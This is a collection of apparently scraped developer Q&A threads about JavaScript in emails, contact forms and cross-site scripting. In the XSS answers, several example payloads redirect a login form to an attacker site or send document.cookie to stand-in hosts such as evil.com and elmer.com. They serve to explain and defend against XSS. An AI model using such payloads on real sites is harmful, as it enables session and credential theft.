i want to make javascript alert work in gmail / outlook, see below code
it's not working how can i do it ,
<script>
alert('hiii');
</script>
Any script placed in an email will be stripped out by most email clients for security reasons.
Scripting in Emails
The short answer is that scripting is unsupported in emails. This is hardly surprising, given the obvious security risks involved with a script running inside an application that has all that personal information stored in it.
Webmail clients are mostly running the interface in JavaScript and are not keen on your email interfering with that, and desktop client filters often consider JavaScript to be an indicator of spam or phishing emails. Even in the cases where it might run, there really is little benefit to scripting in emails.
Keep your emails as straight HTML and CSS, and avoid the hassle.
https://www.campaignmonitor.com/guides/coding/technologies/
If you need to run some script related to the recipient of the email you would need to get them to click a link in the email to open a website to be able to use full JS capabilities.
Related
I'm trying to create a personal website that has a contact form -- message box, for example -- but whenever I click submit or send, it opens up my Outlook e-mail, collects all the data I wrote down and then I have to click send again in Outlook to finally deliver that e-mail to someone. I'm new to webDev, so I'm just wondering if it's possible.
mailto: URLs are very unreliable and (when they work) always interact with the mail client on the user's machine.
Any solution involving submitting a form to a web server and sending email using server-side programming won't.
Use a server-side solution. Third-party hosted options exist if you don't want to do any server-side programming yourself.
The way to do this is to use a form to send data to your server. Your server then connects to an SMTP server to send the email.
If web pages could send emails on behalf of people without interaction, this would be used for spam.
It is not possible to directly send email from the web browser, whether it is CSS, HTML, nor Javascript.
I'm assuming that you'd like a contact page which would allow anyone visiting to fill in a small form which notifies you by email when they submit it?
unfortunately, this isn't possible using only css, html or javascript - which are the tools available to you in the web browser.
If you're willing to go a little deeper, then this is entirely possible given a server-side application. It's common to do this kind of thing in PHP, but any server-side language would be able to do this. You would need to do some set-up if you wanted to do it yourself, things like setting up a mail server to send outgoing mail. These things can be tricky. I'm sure that there are also many hosted options available, but I'm afraid I don't know of any.
OK we have a 3rd party development team that has created an App for us that pushes emails out for us. But we have installed New Relic on the server and turned on Browser tracking but the emails that are being generated out of that app now have the New Relic code in the head. Will this cause Deliverability issues with there being a script tag in the email being sent?
Obviously the goal is to have the developers to remove this code or we can turn off browser tracking but i was wondering if this will hurt our Deliverability with it having 2 script tags in the email.
Thanks,
T
Well, Gmail will strip out any content between <script> tags before displaying the message. It doesn't mean that your message won't be delivered, but certain clients may mark it as Spam.
Most web mail providers do this to prevent against XSS attacks.
In short, better to remove it, because the code will likely never get executed by some of the largest web and email clients around.
Ben has an excellent answer on what will happen with the scripts.
I just want to mention on how you should remove the scripts:
Currently you can use API calls on all agents except for Node.js and Java.
If you can run the appropriate API call when calling the preview of the pages, it will prevent the script injection.
Here is where you can find the documentation for each:
PHP: http://docs.newrelic.com/docs/agents/php-agent/configuration/php-agent-api#api-rum-disable
Ruby: http://docs.newrelic.com/docs/agents/ruby-agent/installation-and-configuration/ignoring-specific-transactions#page-load-timing-rum
.NET: https://docs.newrelic.com/docs/agents/net-agent/features/net-agent-api#disable_browser
Python: https://docs.newrelic.com/docs/agents/python-agent/customization-extension/python-transaction-api#disable_browser_autorum
I'm a PHP developer and I'm looking to improve the security of my sites.
From what I understand the following are two major types of vulnerabilities which affect web applications:
SQL Injection
XSS
SQL Injection can be fixed with prepared statements - easy.
But I still don't really get XSS - is the following an example of XSS?...
Page full of user-made content has a login form at the top (site-wide).
The user's input to the page is not HTML-escaped.
A user posts the following content (e.g. a comment) to the page...
A really nice comment
<!-- now an evil script (example here with jquery, but easily done without) --->
<script type="text/javascript">
$(document).ready(function() {
$('#login_form').attr('action','http://somehackysite.com/givemeyourpw.php');
});
</script>
An innocent user comes to the page, the script executes.
The innocent user realises they're not logged in, and enter their details into the form.
The user's details are sent off to http://somehackysite.com/givemyourpw.php and then the user's account details are stolen.
So I really have three questions here:
Would this work?
Is this XSS?
Are there any precautions developers should take against XSS other than escaping HTML?
There are two types are XSS attacks: Reflected XSS and Persistent XSS attacks. What you've described, where a user of the site inputs data that gets saved on the server side, and is rendered for anyone viewing a page, is considered Persistent XSS. Similar attacks would be if you have a comment box on a post that doesn't escape Javascript, or a profile page I can put anything into.
The other class of XSS attacks is Reflected XSS. These are a little more complicated, but they amount to one of the arguments in the URL for a page not being escaped. They frequently come up in things like Search pages on large websites. You'll get a URL that includes some javascript in it (sorry, my example got mangled by the renderer here, so I can't show you an example) , and the page will render the javascript which would allow someone to craft a malicious URL. These are especially dangerous on sites that hand any sort of financial data; imagine a conscientious user who always checks to make sure the they're going to the write link to their bank, but because of a Reflected XSS attack an attacker is able to send them to a legitimate page on their bank's website, but that has malicious code in it.
In any case, your example is Persistent XSS. You can do even more nefarious things with attacks like that than just changing where a login form sends users. They've been popular for years to do things like scraping information from personal areas of sites, or coupled with CSRF to cause an authenticated user to do something by simply looking at a page. There were a few MySpace viruses a while back that did that, and spread from profile to profile.
Is this XSS?
Yes, this is an injection flaw in general and would be referred to as a XSS exploit in this particular case as it’s JavaScript that was injected.
But this injection flaw, where one user’s input gets reflected to other users without any changes, can also yield to other attacks like defacement.
Would this work?
Yes, it’s very likely that this would work as it’s the origin server that serves this code snipped just like any other code in the web page. So it’s like the author of the web site is the originator of this code and will be treated likewise.
Are there any precautions developers should take against XSS other than escaping HTML?
There are actually three different types of XSS: DOM based XSS, Reflected XSS, and Stored/persistent XSS). Your example is a stored/persistend XSS exploit as the server deploys the exploit with every request.
The general rule is not to trust any user input. That said either only valid user input should be allowed or the user input is filtered (removing invalid values) or properly encoded (convert invalid values) before outputting it. See OWASP’s XSS Cheat Sheet for further information.
it's xss and i believe it's javascript injection too
so i think this link will help
Yes that is an example of a basic persistent XSS attack. Not only could a user steal credentials in this situation but also attempt to infect visitors, or spam links through your site.
OWASP XSS Prevention Guide is a good start.
https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
Is there a way to track if my javascript code is being used on another site?
I work for a software development company and although I'm not a developer as such I do get involved with some of the more simple Javascript requests we get from our customers.
However, sometimes our customers want to see the Javascript working before agreeing to pay for it. My problem here is that although they are not going to be very technical they may have enough knowledge to look at the page source and effectively 'steal' the script.
Can I either prevent them from doing this or add some kind of tracking to my code somewhere so if they do a simple copy / paste then I can receive notification somehow of the script being used on another site?
Thank you
A few things you can do:
Obfuscate your code so it'll be harder to find out what to copy for non technical people.
Add a line that checks the domain name of the page and throws an exception or does some other trick to terminate if the domain is not your demo server.
Add an Ajax query to your server to validate that the script is allowed to run and terminate if there is no validation.
All said here will only protect against non-technical people. Javascript is an interpreted language and as such the entire code is sent to the browser. A skilled programmer will know to go around your blockings.
it is not easy to track your script over all www but there are ways to protect your js codes. there are plenty of sites for encoding and obfuscation like the site below:
http://javascriptobfuscator.com/default.aspx
They would still be able to use your codes but you can hide some protection codes in obfuscated version like trial timeout values or even posting some values like site url to your server for tracking.
our customers want to see the Javascript working before agreeing to pay for it.
You can achieve a good level of security by setting up a demo machine. Have the users remote into a session to provide a demo of the product. Ideally, a shared session where you can "walk them through it" (aka watch what they are doing).
Similar to a video conference, but this way they can use the browser. Don't make the site public, run the webserver local only (close port 80 on the firewall). Take the remote desktop server down after the demo and change the password.
Use the DOM API to a <script> tag that points to a server-side script on your server and append it to the <head>.
Using jQuery:
$.getJSON('http://yourserver.com/TrackScript', { url: document.location });
I just happen to read the joel's blog here...
So for example if you have a web page that says “What is your name?” with an edit box and then submitting that page takes you to another page that says, Hello, Elmer! (assuming the user’s name is Elmer), well, that’s a security vulnerability, because the user could type in all kinds of weird HTML and JavaScript instead of “Elmer” and their weird JavaScript could do narsty things, and now those narsty things appear to come from you, so for example they can read cookies that you put there and forward them on to Dr. Evil’s evil site.
Since javascript runs on client end. All it can access or do is only on the client end.
It can read informations stored in hidden fields and change them.
It can read, write or manipulate cookies...
But I feel, these informations are anyway available to him. (if he is smart enough to pass javascript in a textbox. So we are not empowering him with new information or providing him undue access to our server...
Just curious to know whether I miss something. Can you list the things that a malicious user can do with this security hole.
Edit : Thanks to all for enlightening . As kizzx2 pointed out in one of the comments... I was overlooking the fact that a JavaScript written by User A may get executed in the browser of User B under numerous circumstances, in which case it becomes a great risk.
Cross Site Scripting is a really big issue with javascript injection
It can read, write or manipulate cookies
That's the crucial part. You can steal cookies like this: simply write a script which reads the cookie, and send it to some evil domain using AJAX (with JSONP to overcome the cross domain issues, I think you don't even need to bother with ajax, a simple <img src="http://evil.com/?cookieValue=123"> would suffice) and email yourself the authentication cookie of the poor guy.
I think what Joel is referring to in his article is that the scenario he describes is one which is highly vulnerable to Script Injection attacks, two of the most well known of which are Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF).
Since most web sites use cookies as part of their authentication/session management solution, if a malicious user is able to inject malicious script into the page markup that is served to other users, that malicious user can do a whole host of things to the detriment of the other users, such as steal cookies, make transactions on their behalf, replace all of your served content with their own, create forms that imitate your own and post data to their site, etc, etc.
There are answers that explain CSRF and XSS. I'm the one to say that for the particular quoted passage, there is no security threat at all.
That quoted passage is simple enough -- it allows you to execute some JavaScript. Congratulations -- I can do the same with Firebug, which gives me a command line to play with instead of having to fake it using a text box that some Web site gives me and I have to abuse it.
I really think Joel wasn't really sober when writing that. The example was just plain misleading.
Edit some more elaborations:
We should keep several things in mind:
Code cannot do any harm unless executed.
JavaScript can only be executed on client side (Yes there are server-side JavaScript, but apparently not in the context of this question/article)
If the user writes some JavaScript, which then gets executed on his own machine -- where's the harm? There is none, because he can execute JavaScript from Firebug anytime he wants without going through a text box.
Of course there are CSRF, which other people have already explained. The only case where there is a threat is where User A can write some code which gets executed in User B's machine.
Almost all answers that directly answer the question "What harm can JavaScript do?" explain in the direction of CSRF -- which requires User A being able to write code that User B can execute.
So here's a more complete, two part answer:
If we're talking about the quoted passage, the answer is "no harm"
I do not interpret the passage's meaning to mean something like the scenario described above, since it's very obviously talking about a basic "Hello, Elmer world" example. To synthetically induce implicit meanings out of the passage just makes it more misleading.
If we're talking about "What harm can JavaScript do, in general," the answer is related to basic XSS/CSRF
Bonus Here are a couple of more real-life scenarios of how an CSRF (User A writes JavaScript that gets exected on User B's machine) can take place
A Web page takes parameters from GET. An attacker can lure a victim to visit http://foo.com/?send_password_to=malicious.attacker.com
A Web page displays one user's generated content verbatim to other users. An attacker could put something likm this in his Avatar's URL: <script>send_your_secret_cookies_to('http://evil.com')</script> (this needs some tweaking to get pass quoting and etc., but you get the idea)
Cause your browser to sent requests to other services using your authentication details and then send the results back to the attacker.
Show a big picture of a penis instead of your company logo.
Send any personal info or login cookies to a server without your consent.
I would look the wikipedia article on javascript security. It covers a number of vulnerabilities.
If you display data on your page that comes from a user without sanitizing that data first, it's a huge security vulnerability, and here's why:
Imagine that instead of "Hello, Elmer!", that user entered
<script src="http://a-script-from-another-site.js" type="text/javascript"></script>
and you're just displaying that information on a page somewhere without sanitizing it. That user can now do anything he wants to your page without other users coming to that page being aware. They could read the other users' cookie information and send it anywhere they want, they could change your CSS and hide everything on your page and display their own content, they could replace your login form with their own that sends information to any place they wish, etc. The real danger is when other users come to your site after that user. No, they can't do anything directly to your server with JavaScript that they couldn't do anyway, but what they can do is get access to information from other people that visit your site.
If you're saving that information to a database and displaying it, all users who visit that site will be served that content. If it's just content that's coming from a form that isn't actually saved anywhere (submitting a form and you're getting the data from a GET or POST request) then the user could maliciously craft a URL (oursite.com/whatsyourname.php?username=Elmer but instead of Elmer, you put in your JavaScript) to your site that contained JavaScript and trick another user into visiting that link.
For an example with saving information in a database: let's say you have a forum that has a log in form on the front page along with lists of posts and their user names (which you aren't sanitizing). Instead of an actual user name, someone signs up with their user name being a <script> tag. Now they can do anything on your front page that JavaScript will accomplish, and every user that visits your site will be served that bit of JavaScript.
Little example shown to me a while ago during XSS class..
Suppose Elmer is amateur hacker. Instead of writing his name in the box, he types this:
<script>$.ajax("http://elmer.com/save.php?cookie=" + document.cookie);</script>
Now if the server keeps a log of the values written by users and some admin is logging in and viewing those values..... Elmer will get the cookie of that administrator!
Let's say a user would read your sourcecode and make his own tweak of for instance an ajax-call posting unwanted data to your server. Some developers are good at protecting direct userinput, but might not be as careful protecting database calls made from a ajax-call where the dev thinks he has control of all the data that is being sent trough the call.